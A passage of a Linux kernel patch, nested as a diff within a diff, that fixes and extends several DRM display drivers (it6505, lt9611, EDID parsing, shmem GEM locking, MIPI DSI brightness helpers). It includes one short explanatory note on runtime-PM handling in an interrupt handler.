+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+index 308a543178a56..59884ef651b39 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
++++ b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+@@ -113,6 +113,13 @@
+ 	(PHY_AUX_CNTL__AUX## cd ##_PAD_RXSEL## mask_sh),\
+ 	(DC_GPIO_AUX_CTRL_5__DDC_PAD## cd ##_I2CMODE## mask_sh)}
+ 
++#define DDC_MASK_SH_LIST_DCN2_VGA(mask_sh) \
++	{DDC_MASK_SH_LIST_COMMON(mask_sh),\
++	0,\
++	0,\
++	0,\
++	0}
++
+ struct ddc_registers {
+ 	struct gpio_registers gpio;
+ 	uint32_t ddc_setup;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+index 0e42e721dd15a..1d9f9c53d2bd6 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+@@ -331,6 +331,7 @@ struct timing_generator_funcs {
+ 			uint32_t vtotal_change_limit);
+ 
+ 	void (*init_odm)(struct timing_generator *tg);
++	void (*wait_drr_doublebuffer_pending_clear)(struct timing_generator *tg);
+ };
+ 
+ #endif
+diff --git a/drivers/gpu/drm/amd/include/amd_shared.h b/drivers/gpu/drm/amd/include/amd_shared.h
+index f175e65b853a0..e4a22c68517d1 100644
+--- a/drivers/gpu/drm/amd/include/amd_shared.h
++++ b/drivers/gpu/drm/amd/include/amd_shared.h
+@@ -240,6 +240,7 @@ enum DC_FEATURE_MASK {
+ 	DC_DISABLE_LTTPR_DP2_0 = (1 << 6), //0x40, disabled by default
+ 	DC_PSR_ALLOW_SMU_OPT = (1 << 7), //0x80, disabled by default
+ 	DC_PSR_ALLOW_MULTI_DISP_OPT = (1 << 8), //0x100, disabled by default
++	DC_ENABLE_SUBVP_DRR = (1 << 9), // 0x200, disabled by default
+ };
+ 
+ enum DC_DEBUG_MASK {
+diff --git a/drivers/gpu/drm/ast/ast_mode.c b/drivers/gpu/drm/ast/ast_mode.c
+index 66a4a41c3fe94..d314b9e7c05f9 100644
+--- a/drivers/gpu/drm/ast/ast_mode.c
++++ b/drivers/gpu/drm/ast/ast_mode.c
+@@ -636,7 +636,7 @@ static void ast_handle_damage(struct ast_plane *ast_plane, struct iosys_map *src
+ 			      struct drm_framebuffer *fb,
+ 			      const struct drm_rect *clip)
+ {
+-	struct iosys_map dst = IOSYS_MAP_INIT_VADDR(ast_plane->vaddr);
++	struct iosys_map dst = IOSYS_MAP_INIT_VADDR_IOMEM(ast_plane->vaddr);
+ 
+ 	iosys_map_incr(&dst, drm_fb_clip_offset(fb->pitches[0], fb->format, clip));
+ 	drm_fb_memcpy(&dst, fb->pitches, src, fb, clip);
+diff --git a/drivers/gpu/drm/bridge/ite-it6505.c b/drivers/gpu/drm/bridge/ite-it6505.c
+index 21a9b8422bda5..e7f7d0ce13805 100644
+--- a/drivers/gpu/drm/bridge/ite-it6505.c
++++ b/drivers/gpu/drm/bridge/ite-it6505.c
+@@ -412,7 +412,6 @@ struct it6505 {
+ 	 * Mutex protects extcon and interrupt functions from interfering
+ 	 * each other.
+ 	 */
+-	struct mutex irq_lock;
+ 	struct mutex extcon_lock;
+ 	struct mutex mode_lock; /* used to bridge_detect */
+ 	struct mutex aux_lock; /* used to aux data transfers */
+@@ -2494,10 +2493,8 @@ static irqreturn_t it6505_int_threaded_handler(int unused, void *data)
+ 	};
+ 	int int_status[3], i;
+ 
+-	mutex_lock(&it6505->irq_lock);
+-
+-	if (it6505->enable_drv_hold || !it6505->powered)
+-		goto unlock;
++	if (it6505->enable_drv_hold || pm_runtime_get_if_in_use(dev) <= 0)
++		return IRQ_HANDLED;
+ 
+ 	int_status[0] = it6505_read(it6505, INT_STATUS_01);
+ 	int_status[1] = it6505_read(it6505, INT_STATUS_02);
+@@ -2515,16 +2512,14 @@ static irqreturn_t it6505_int_threaded_handler(int unused, void *data)
+ 	if (it6505_test_bit(irq_vec[0].bit, (unsigned int *)int_status))
+ 		irq_vec[0].handler(it6505);
+ 
+-	if (!it6505->hpd_state)
+-		goto unlock;
+-
+-	for (i = 1; i < ARRAY_SIZE(irq_vec); i++) {
+-		if (it6505_test_bit(irq_vec[i].bit, (unsigned int *)int_status))
+-			irq_vec[i].handler(it6505);
++	if (it6505->hpd_state) {
++		for (i = 1; i < ARRAY_SIZE(irq_vec); i++) {
++			if (it6505_test_bit(irq_vec[i].bit, (unsigned int *)int_status))
++				irq_vec[i].handler(it6505);
++		}
+ 	}
+ 
+-unlock:
+-	mutex_unlock(&it6505->irq_lock);
++	pm_runtime_put_sync(dev);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -3277,7 +3272,6 @@ static int it6505_i2c_probe(struct i2c_client *client,
+ 	if (!it6505)
+ 		return -ENOMEM;
+ 
+-	mutex_init(&it6505->irq_lock);
+ 	mutex_init(&it6505->extcon_lock);
+ 	mutex_init(&it6505->mode_lock);
+ 	mutex_init(&it6505->aux_lock);
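
[Dropping irq_lock in favour of pm_runtime_get_if_in_use() changes how the threaded IRQ handler synchronizes with suspend: rather than serializing on a mutex, the handler only proceeds if it can take a runtime-PM reference on an already-active device, and bails out immediately when the device is suspended or runtime PM is unavailable (the call returns 0 or a negative value in those cases). The resulting shape, as a sketch:

	#include <linux/interrupt.h>
	#include <linux/pm_runtime.h>

	static irqreturn_t my_irq_thread(int irq, void *data)
	{
		struct device *dev = data;	/* hypothetical wiring */

		if (pm_runtime_get_if_in_use(dev) <= 0)
			return IRQ_HANDLED;	/* suspended: nothing to do */

		/* ... read and dispatch interrupt status ... */

		pm_runtime_put_sync(dev);
		return IRQ_HANDLED;
	}
]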
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 7c0a99173b39f..3b77238ca4aff 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -187,12 +187,14 @@ static void lt9611_mipi_video_setup(struct lt9611 *lt9611,
+ 
+ 	regmap_write(lt9611->regmap, 0x8319, (u8)(hfront_porch % 256));
+ 
+-	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256));
++	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256) |
++						((hfront_porch / 256) << 4));
+ 	regmap_write(lt9611->regmap, 0x831b, (u8)(hsync_porch % 256));
+ }
+ 
+-static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int postdiv)
+ {
++	unsigned int pcr_m = mode->clock * 5 * postdiv / 27000;
+ 	const struct reg_sequence reg_cfg[] = {
+ 		{ 0x830b, 0x01 },
+ 		{ 0x830c, 0x10 },
+@@ -207,7 +209,6 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 
+ 		/* stage 2 */
+ 		{ 0x834a, 0x40 },
+-		{ 0x831d, 0x10 },
+ 
+ 		/* MK limit */
+ 		{ 0x832d, 0x38 },
+@@ -222,30 +223,28 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 		{ 0x8325, 0x00 },
+ 		{ 0x832a, 0x01 },
+ 		{ 0x834a, 0x10 },
+-		{ 0x831d, 0x10 },
+-		{ 0x8326, 0x37 },
+ 	};
++	u8 pol = 0x10;
+ 
+-	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++	if (mode->flags & DRM_MODE_FLAG_NHSYNC)
++		pol |= 0x2;
++	if (mode->flags & DRM_MODE_FLAG_NVSYNC)
++		pol |= 0x1;
++	regmap_write(lt9611->regmap, 0x831d, pol);
+ 
+-	switch (mode->hdisplay) {
+-	case 640:
+-		regmap_write(lt9611->regmap, 0x8326, 0x14);
+-		break;
+-	case 1920:
+-		regmap_write(lt9611->regmap, 0x8326, 0x37);
+-		break;
+-	case 3840:
++	if (mode->hdisplay == 3840)
+ 		regmap_multi_reg_write(lt9611->regmap, reg_cfg2, ARRAY_SIZE(reg_cfg2));
+-		break;
+-	}
++	else
++		regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++
++	regmap_write(lt9611->regmap, 0x8326, pcr_m);
+ 
+ 	/* pcr rst */
+ 	regmap_write(lt9611->regmap, 0x8011, 0x5a);
+ 	regmap_write(lt9611->regmap, 0x8011, 0xfa);
+ }
+ 
+-static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int *postdiv)
+ {
+ 	unsigned int pclk = mode->clock;
+ 	const struct reg_sequence reg_cfg[] = {
+@@ -263,12 +262,16 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+-	if (pclk > 150000)
++	if (pclk > 150000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x88);
+-	else if (pclk > 70000)
++		*postdiv = 1;
++	} else if (pclk > 70000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x99);
+-	else
++		*postdiv = 2;
++	} else {
+ 		regmap_write(lt9611->regmap, 0x812d, 0xaa);
++		*postdiv = 4;
++	}
+ 
+ 	/*
+ 	 * first divide pclk by 2 first
+@@ -448,12 +451,11 @@ static void lt9611_sleep_setup(struct lt9611 *lt9611)
+ 		{ 0x8023, 0x01 },
+ 		{ 0x8157, 0x03 }, /* set addr pin as output */
+ 		{ 0x8149, 0x0b },
+-		{ 0x8151, 0x30 }, /* disable IRQ */
++
+ 		{ 0x8102, 0x48 }, /* MIPI Rx power down */
+ 		{ 0x8123, 0x80 },
+ 		{ 0x8130, 0x00 },
+-		{ 0x8100, 0x01 }, /* bandgap power down */
+-		{ 0x8101, 0x00 }, /* system clk power down */
++		{ 0x8011, 0x0a },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap,
+@@ -767,7 +769,7 @@ static const struct drm_connector_funcs lt9611_bridge_connector_funcs = {
+ static struct mipi_dsi_device *lt9611_attach_dsi(struct lt9611 *lt9611,
+ 						 struct device_node *dsi_node)
+ {
+-	const struct mipi_dsi_device_info info = { "lt9611", 0, NULL };
++	const struct mipi_dsi_device_info info = { "lt9611", 0, lt9611->dev->of_node};
+ 	struct mipi_dsi_device *dsi;
+ 	struct mipi_dsi_host *host;
+ 	struct device *dev = lt9611->dev;
+@@ -857,12 +859,18 @@ static enum drm_mode_status lt9611_bridge_mode_valid(struct drm_bridge *bridge,
+ static void lt9611_bridge_pre_enable(struct drm_bridge *bridge)
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
++	static const struct reg_sequence reg_cfg[] = {
++		{ 0x8102, 0x12 },
++		{ 0x8123, 0x40 },
++		{ 0x8130, 0xea },
++		{ 0x8011, 0xfa },
++	};
+ 
+ 	if (!lt9611->sleep)
+ 		return;
+ 
+-	lt9611_reset(lt9611);
+-	regmap_write(lt9611->regmap, 0x80ee, 0x01);
++	regmap_multi_reg_write(lt9611->regmap,
++			       reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+ 	lt9611->sleep = false;
+ }
+@@ -882,14 +890,15 @@ static void lt9611_bridge_mode_set(struct drm_bridge *bridge,
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
+ 	struct hdmi_avi_infoframe avi_frame;
++	unsigned int postdiv;
+ 	int ret;
+ 
+ 	lt9611_bridge_pre_enable(bridge);
+ 
+ 	lt9611_mipi_input_digital(lt9611, mode);
+-	lt9611_pll_setup(lt9611, mode);
++	lt9611_pll_setup(lt9611, mode, &postdiv);
+ 	lt9611_mipi_video_setup(lt9611, mode);
+-	lt9611_pcr_setup(lt9611, mode);
++	lt9611_pcr_setup(lt9611, mode, postdiv);
+ 
+ 	ret = drm_hdmi_avi_infoframe_from_display_mode(&avi_frame,
+ 						       &lt9611->connector,
+diff --git a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+index 97359f807bfc3..cbfa05a6767b5 100644
+--- a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
++++ b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+@@ -440,7 +440,11 @@ static int __init stdpxxxx_ge_b850v3_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	ret = i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	if (ret)
++		i2c_del_driver(&stdp4028_ge_b850v3_fw_driver);
++
++	return ret;
+ }
+ module_init(stdpxxxx_ge_b850v3_init);
+ 
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 2a58eb271f701..b9b681086fc49 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1264,10 +1264,10 @@ static int tc_dsi_rx_enable(struct tc_data *tc)
+ 	u32 value;
+ 	int ret;
+ 
+-	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 5);
++	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 25);
+ 	regmap_write(tc->regmap, PPI_D0S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_D1S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_TX_RX_TA, TTA_GET | TTA_SURE);
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 7ba9467fff129..047c14ddbbf11 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -346,7 +346,7 @@ static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+ 
+ 	/* Deassert reset */
+ 	gpiod_set_value_cansleep(ctx->enable_gpio, 1);
+-	usleep_range(1000, 1100);
++	usleep_range(10000, 11000);
+ 
+ 	/* Get the LVDS format from the bridge state. */
+ 	bridge_state = drm_atomic_get_new_bridge_state(state, bridge);
+diff --git a/drivers/gpu/drm/drm_client.c b/drivers/gpu/drm/drm_client.c
+index 056ab9d5f313b..313cbabb12b2d 100644
+--- a/drivers/gpu/drm/drm_client.c
++++ b/drivers/gpu/drm/drm_client.c
+@@ -198,6 +198,11 @@ void drm_client_dev_hotplug(struct drm_device *dev)
+ 	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+ 		return;
+ 
++	if (!dev->mode_config.num_connector) {
++		drm_dbg_kms(dev, "No connectors found, will not send hotplug events!\n");
++		return;
++	}
++
+ 	mutex_lock(&dev->clientlist_mutex);
+ 	list_for_each_entry(client, &dev->clientlist, list) {
+ 		if (!client->funcs || !client->funcs->hotplug)
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 3841aba17abdc..b94adb9bbefb8 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -5249,13 +5249,12 @@ static int add_cea_modes(struct drm_connector *connector,
+ {
+ 	const struct cea_db *db;
+ 	struct cea_db_iter iter;
++	const u8 *hdmi = NULL, *video = NULL;
++	u8 hdmi_len = 0, video_len = 0;
+ 	int modes = 0;
+ 
+ 	cea_db_iter_edid_begin(drm_edid, &iter);
+ 	cea_db_iter_for_each(db, &iter) {
+-		const u8 *hdmi = NULL, *video = NULL;
+-		u8 hdmi_len = 0, video_len = 0;
+-
+ 		if (cea_db_tag(db) == CTA_DB_VIDEO) {
+ 			video = cea_db_data(db);
+ 			video_len = cea_db_payload_len(db);
+@@ -5271,18 +5270,17 @@ static int add_cea_modes(struct drm_connector *connector,
+ 			modes += do_y420vdb_modes(connector, vdb420,
+ 						  cea_db_payload_len(db) - 1);
+ 		}
+-
+-		/*
+-		 * We parse the HDMI VSDB after having added the cea modes as we
+-		 * will be patching their flags when the sink supports stereo
+-		 * 3D.
+-		 */
+-		if (hdmi)
+-			modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
+-						    video, video_len);
+ 	}
+ 	cea_db_iter_end(&iter);
+ 
++	/*
++	 * We parse the HDMI VSDB after having added the cea modes as we will be
++	 * patching their flags when the sink supports stereo 3D.
++	 */
++	if (hdmi)
++		modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
++					    video, video_len);
++
+ 	return modes;
+ }
+ 
+@@ -6885,8 +6883,6 @@ static u8 drm_mode_hdmi_vic(const struct drm_connector *connector,
+ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 			   const struct drm_display_mode *mode)
+ {
+-	u8 vic;
+-
+ 	/*
+ 	 * HDMI spec says if a mode is found in HDMI 1.4b 4K modes
+ 	 * we should send its VIC in vendor infoframes, else send the
+@@ -6896,13 +6892,18 @@ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 	if (drm_mode_hdmi_vic(connector, mode))
+ 		return 0;
+ 
+-	vic = drm_match_cea_mode(mode);
++	return drm_match_cea_mode(mode);
++}
+ 
+-	/*
+-	 * HDMI 1.4 VIC range: 1 <= VIC <= 64 (CEA-861-D) but
+-	 * HDMI 2.0 VIC range: 1 <= VIC <= 107 (CEA-861-F). So we
+-	 * have to make sure we dont break HDMI 1.4 sinks.
+-	 */
++/*
++ * Avoid sending VICs defined in HDMI 2.0 in AVI infoframes to sinks that
++ * conform to HDMI 1.4.
++ *
++ * HDMI 1.4 (CTA-861-D) VIC range: [1..64]
++ * HDMI 2.0 (CTA-861-F) VIC range: [1..107]
++ */
++static u8 vic_for_avi_infoframe(const struct drm_connector *connector, u8 vic)
++{
+ 	if (!is_hdmi2_sink(connector) && vic > 64)
+ 		return 0;
+ 
+@@ -6978,7 +6979,7 @@ drm_hdmi_avi_infoframe_from_display_mode(struct hdmi_avi_infoframe *frame,
+ 		picture_aspect = HDMI_PICTURE_ASPECT_NONE;
+ 	}
+ 
+-	frame->video_code = vic;
++	frame->video_code = vic_for_avi_infoframe(connector, vic);
+ 	frame->picture_aspect = picture_aspect;
+ 	frame->active_aspect = HDMI_ACTIVE_ASPECT_PICTURE;
+ 	frame->scan_mode = HDMI_SCAN_MODE_UNDERSCAN;
+diff --git a/drivers/gpu/drm/drm_fbdev_generic.c b/drivers/gpu/drm/drm_fbdev_generic.c
+index 593aa3283792b..215fe16ff1fb4 100644
+--- a/drivers/gpu/drm/drm_fbdev_generic.c
++++ b/drivers/gpu/drm/drm_fbdev_generic.c
+@@ -390,11 +390,6 @@ static int drm_fbdev_client_hotplug(struct drm_client_dev *client)
+ 	if (dev->fb_helper)
+ 		return drm_fb_helper_hotplug_event(dev->fb_helper);
+ 
+-	if (!dev->mode_config.num_connector) {
+-		drm_dbg_kms(dev, "No connectors found, will not create framebuffer!\n");
+-		return 0;
+-	}
+-
+ 	drm_fb_helper_prepare(dev, fb_helper, &drm_fb_helper_generic_funcs);
+ 
+ 	ret = drm_fb_helper_init(dev, fb_helper);
+diff --git a/drivers/gpu/drm/drm_fourcc.c b/drivers/gpu/drm/drm_fourcc.c
+index 6242dfbe92402..0f17dfa8702b4 100644
+--- a/drivers/gpu/drm/drm_fourcc.c
++++ b/drivers/gpu/drm/drm_fourcc.c
+@@ -190,6 +190,10 @@ const struct drm_format_info *__drm_format_info(u32 format)
+ 		{ .format = DRM_FORMAT_BGRA5551,	.depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1, .has_alpha = true },
+ 		{ .format = DRM_FORMAT_RGB565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#ifdef __BIG_ENDIAN
++		{ .format = DRM_FORMAT_XRGB1555 | DRM_FORMAT_BIG_ENDIAN, .depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++		{ .format = DRM_FORMAT_RGB565 | DRM_FORMAT_BIG_ENDIAN, .depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#endif
+ 		{ .format = DRM_FORMAT_RGB888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_XRGB8888,	.depth = 24, .num_planes = 1, .cpp = { 4, 0, 0 }, .hsub = 1, .vsub = 1 },
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index b602cd72a1205..7af9da886d4e5 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -681,23 +681,7 @@ struct sg_table *drm_gem_shmem_get_sg_table(struct drm_gem_shmem_object *shmem)
+ }
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_sg_table);
+ 
+-/**
+- * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
+- *				 scatter/gather table for a shmem GEM object.
+- * @shmem: shmem GEM object
+- *
+- * This function returns a scatter/gather table suitable for driver usage. If
+- * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
+- * table created.
+- *
+- * This is the main function for drivers to get at backing storage, and it hides
+- * and difference between dma-buf imported and natively allocated objects.
+- * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
+- *
+- * Returns:
+- * A pointer to the scatter/gather table of pinned pages or errno on failure.
+- */
+-struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++static struct sg_table *drm_gem_shmem_get_pages_sgt_locked(struct drm_gem_shmem_object *shmem)
+ {
+ 	struct drm_gem_object *obj = &shmem->base;
+ 	int ret;
+@@ -708,7 +692,7 @@ struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
+ 
+ 	WARN_ON(obj->import_attach);
+ 
+-	ret = drm_gem_shmem_get_pages(shmem);
++	ret = drm_gem_shmem_get_pages_locked(shmem);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+@@ -730,9 +714,39 @@ err_free_sgt:
+ 	sg_free_table(sgt);
+ 	kfree(sgt);
+ err_put_pages:
+-	drm_gem_shmem_put_pages(shmem);
++	drm_gem_shmem_put_pages_locked(shmem);
+ 	return ERR_PTR(ret);
+ }
++
++/**
++ * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
++ *				 scatter/gather table for a shmem GEM object.
++ * @shmem: shmem GEM object
++ *
++ * This function returns a scatter/gather table suitable for driver usage. If
++ * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
++ * table created.
++ *
++ * This is the main function for drivers to get at backing storage, and it hides
++ * and difference between dma-buf imported and natively allocated objects.
++ * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
++ *
++ * Returns:
++ * A pointer to the scatter/gather table of pinned pages or errno on failure.
++ */
++struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++{
++	int ret;
++	struct sg_table *sgt;
++
++	ret = mutex_lock_interruptible(&shmem->pages_lock);
++	if (ret)
++		return ERR_PTR(ret);
++	sgt = drm_gem_shmem_get_pages_sgt_locked(shmem);
++	mutex_unlock(&shmem->pages_lock);
++
++	return sgt;
++}
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_pages_sgt);
+ 
+ /**
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index 497ef4b6a90a4..4bc15fbd009d8 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -1224,6 +1224,58 @@ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ }
+ EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness);
+ 
++/**
++ * mipi_dsi_dcs_set_display_brightness_large() - sets the 16-bit brightness value
++ *    of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness)
++{
++	u8 payload[2] = { brightness >> 8, brightness & 0xff };
++	ssize_t err;
++
++	err = mipi_dsi_dcs_write(dsi, MIPI_DCS_SET_DISPLAY_BRIGHTNESS,
++				 payload, sizeof(payload));
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_set_display_brightness_large);
++
++/**
++ * mipi_dsi_dcs_get_display_brightness_large() - gets the current 16-bit
++ *    brightness value of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness)
++{
++	u8 brightness_be[2];
++	ssize_t err;
++
++	err = mipi_dsi_dcs_read(dsi, MIPI_DCS_GET_DISPLAY_BRIGHTNESS,
++				brightness_be, sizeof(brightness_be));
++	if (err <= 0) {
++		if (err == 0)
++			err = -ENODATA;
++
++		return err;
++	}
++
++	*brightness = (brightness_be[0] << 8) | brightness_be[1];
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness_large);
++
+ static int mipi_dsi_drv_probe(struct device *dev)
+ {
+ 	struct mipi_dsi_driver *drv = to_mipi_dsi_driver(dev->driver);
+diff --git a/drivers/gpu/drm/drm_mode_config.c b/drivers/gpu/drm/drm_mode_config.c
+index 688c8afe0bf17..8525ef8515406 100644
+--- a/drivers/gpu/drm/drm_mode_config.c
++++ b/drivers/gpu/drm/drm_mode_config.c
+@@ -399,6 +399,8 @@ static void drm_mode_config_init_release(struct drm_device *dev, void *ptr)
+  */
+ int drmm_mode_config_init(struct drm_device *dev)
+ {
++	int ret;
++
+ 	mutex_init(&dev->mode_config.mutex);
+ 	drm_modeset_lock_init(&dev->mode_config.connection_mutex);
+ 	mutex_init(&dev->mode_config.idr_mutex);
+@@ -420,7 +422,11 @@ int drmm_mode_config_init(struct drm_device *dev)
+ 	init_llist_head(&dev->mode_config.connector_free_list);
+ 	INIT_WORK(&dev->mode_config.connector_free_work, drm_connector_free_work_fn);
+ 
+-	drm_mode_create_standard_properties(dev);
++	ret = drm_mode_create_standard_properties(dev);
++	if (ret) {
++		drm_mode_config_cleanup(dev);
++		return ret;
++	}
+ 
+ 	/* Just to be sure */
+ 	dev->mode_config.num_fb = 0;
+diff --git a/drivers/gpu/drm/drm_modes.c b/drivers/gpu/drm/drm_modes.c
+index 3c8034a8c27bd..951afe8279da8 100644
+--- a/drivers/gpu/drm/drm_modes.c
++++ b/drivers/gpu/drm/drm_modes.c
+@@ -1809,7 +1809,7 @@ static int drm_mode_parse_cmdline_named_mode(const char *name,
+ 		if (ret != name_end)
+ 			continue;
+ 
+-		strcpy(cmdline_mode->name, mode->name);
++		strscpy(cmdline_mode->name, mode->name, sizeof(cmdline_mode->name));
+ 		cmdline_mode->pixel_clock = mode->pixel_clock_khz;
+ 		cmdline_mode->xres = mode->xres;
+ 		cmdline_mode->yres = mode->yres;
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 3659f0465a724..5522d610c5cfd 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -30,12 +30,6 @@ struct drm_dmi_panel_orientation_data {
+ 	int orientation;
+ };
+ 
+-static const struct drm_dmi_panel_orientation_data asus_t100ha = {
+-	.width = 800,
+-	.height = 1280,
+-	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+-};
+-
+ static const struct drm_dmi_panel_orientation_data gpd_micropc = {
+ 	.width = 720,
+ 	.height = 1280,
